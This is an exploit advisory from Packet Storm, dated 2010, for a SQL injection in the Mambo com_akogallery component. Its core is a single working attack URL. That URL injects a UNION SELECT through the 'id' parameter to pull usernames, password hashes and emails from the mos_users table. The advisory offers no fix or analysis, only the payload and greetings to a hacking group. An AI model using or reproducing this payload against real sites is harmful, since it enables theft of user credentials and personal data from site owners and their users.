Mambo Ako Gallery SQL Injection

2010-02-15T00:00:00
ID PACKETSTORM:86288
Type packetstorm
Reporter Snakespc
Modified 2010-02-15T00:00:00

Description

                                        
                                            `==============================================================================  
[»] Mambo com_akogallery Remote Sql Injection Vulnerability  
==============================================================================  
  
[»] Script: [mambo]  
[»] Language: [ PHP ]  
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]  
[»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]  
  
###########################################################################  
===[ Exploit ]===  
  
[»] http://server/index.php?option=com_akogallery&Itemid=91&func=detailgallerie&id=-10+UNION SELECT 1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mos_users  
[»]Author: Snakespc <-  
###########################################################################  
`